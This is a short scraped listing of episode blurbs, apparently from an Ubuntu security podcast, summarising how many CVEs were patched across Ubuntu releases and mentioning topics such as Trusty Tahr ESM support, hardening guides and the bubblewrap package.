This week we look at some details of the 43 unique CVEs addressed across the supported Ubuntu releases and talk about the recently announced Extended Security Maintenance support for Ubuntu 14.04 Trusty Tahr.
43 unique CVEs addressed across the various supported releases of Ubuntu (Bionic, Xenial, Trusty and Precise ESM)
A quieter week in package updates - this week we look at some details of the 9 unique CVEs addressed across the supported Ubuntu releases and talk about various hardening guides for Ubuntu.
9 unique CVEs addressed
This week we look at 29 unique CVEs addressed across the supported Ubuntu releases, a discussion of the Main Inclusion Review process and recent news around the bubblewrap package, and open positions within the team.
29 unique CVEs addressed
83 unique CVEs addressed across the supported Ubuntu releases.
En liten tjänst av I'm With Friends. Finns även på engelska.